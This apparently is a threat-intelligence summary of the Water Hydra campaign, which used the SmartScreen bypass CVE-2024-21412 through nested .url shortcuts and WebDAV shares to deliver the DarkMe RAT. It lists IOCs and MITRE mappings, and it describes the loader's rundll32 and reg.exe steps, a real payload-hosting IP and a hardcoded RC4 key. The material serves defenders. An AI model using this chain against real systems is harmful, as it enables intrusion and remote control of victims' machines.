Keypoints
- Threat actor Water Hydra used a SmartScreen zero-day (CVE-2024-21412 / ZDI-CAN-23100) to bypass SmartScreen and execute code from WebDAV-hosted resources.
- Initial access relied on social engineering: spearphishing posts on forex forums and Telegram channels linking to compromised landing pages that pointed to WebDAV shares disguised as JPEG/PDF lures.
- Attackers abused the Windows search: protocol and Advanced Query Syntax (AQS) to craft an Explorer view and hide the .url extension, plus IconFile/IconIndex to make shortcuts appear as images.
- Nested internet shortcuts (.url referencing another .url) were used to evade prior SmartScreen patches by preventing proper application of Mark-of-the-Web.
- Exploitation triggered retrieval of artifacts from a WebDAV server (notably 84.32.189.74), copying 7z binaries and My2.zip to %TEMP%, extracting payloads, and executing a Visual Basic DLL loader via rundll32.
- The loader (undersets.dll / b3.dll) merged binaries into OnlineProject.dll (DarkMe), imported registry entries via reg.exe to register a COM server, and launched the RAT, which communicates with C2 over a custom TCP protocol.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link β Water Hydra deployed βa spearphishing campaign (T1566.002) on forex trading forums and stock trading Telegram channels to lure potential tradersβ to deliver malicious links.
- [T1105] Ingress Tool Transfer β The protections list references βDisallow Download Of Restricted File Formats (ATT&CK T1105)β, reflecting use of WebDAV to copy tools and payloads such as 7z.dll, 7z.exe, and My2.zip from a remote share.
- [T1574.002] Hijack Execution Flow: DLL Side-Loading/Injection β The protections list includes βIdentified Download Of DLL File Over WebDav (ATT&CK T1574.002)β, matching the technique of downloading and executing undersets.dll/b3.dll via rundll32.
Indicators of Compromise
- [Domain] Malicious landing/WebDAV β fxbulls[.]ru (compromised lure site), 87iavv.com (observed in detection rules)
- [IP address] WebDAV/C2 host β 84.32.189.74 (used as WebDAV server serving 7z, My2.zip, decoy JPEGs)
- [File name] Exploit and payload artifacts β photo_2023-12-29.jpg.url (trojan shortcut), My2.zip (payload archive), undersets.dll / b3.dll (loader/downloader)
- [File hash] DarkMe components β b3.dll MD5 409e7028f820e6854e7197cbb2c45d06 (and SHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c), OnlineProject.dll MD5 93daa51c8af300f9948fe5fd51be3bfb (and SHA-256 d123d92346868aab77ac0fe4f7a1293ebb48cf5af1b01f85ffe7497af5b30738)
In the observed infection flow, Water Hydra lured traders to a compromised landing page that linked to a WebDAV share. The actor used HTML that invoked the Windows search: protocol with crafted AQS queries and the DisplayName element to present a filtered Explorer view; a file named photo_2023-12-29.jpg.url (an INI-style internet shortcut) appeared as a JPEG because Windows hides the .url extension and the shortcut used IconFile/IconIndex to display an image icon. That initial .url pointed to a second .url on a dotted-quad WebDAV server; chaining shortcuts in this way bypassed SmartScreen/Mark-of-the-Web checks (CVE-2024-21412), allowing silent execution without the normal SmartScreen prompt.
After the SmartScreen bypass, the second shortcut executed a CMD script embedded in a ZIP on the WebDAV share. The script copied 7z.dll and 7z.exe and a My2.zip archive from 84.32.189.74 to %TEMP%, used 7z with a password to extract the archive, then launched a Visual Basic DLL loader (undersets.dll / b3.dll) via rundll32 (rundll32 undersets.dll, RunDllEntryPointW). The loader runs obfuscated, reverse-string commands through cmd.exe to download and prepare payload pieces, then merges two binary parts (a1 + a2) into OnlineProject.dll and imports registry entries (reg.exe import kb.txt) to register the payload as a COM server for persistence and execution (rundll32.exe /sta {GUID}).
The final stage is the DarkMe RAT (OnlineProject.dll), a VB6-compiled DLL that registers with its C2 using an RC4-encrypted domain (decrypted with the hardcoded key βnoway123!$$#@35@!β), opens a TCP listener, and sends a structured registration packet (locale, computer/user name, antivirus list, foreground window title) followed by periodic heartbeat messages (Timer3 interval ~5555 ms). DarkMe implements socket communication via a hidden WINDOW (SOCKET_WINDOW) and supports remote commands for file enumeration, shell execution, zipping, and other remote operations, enabling full post-exploitation control once the initial WebDAV/shortcut exploit chain completes.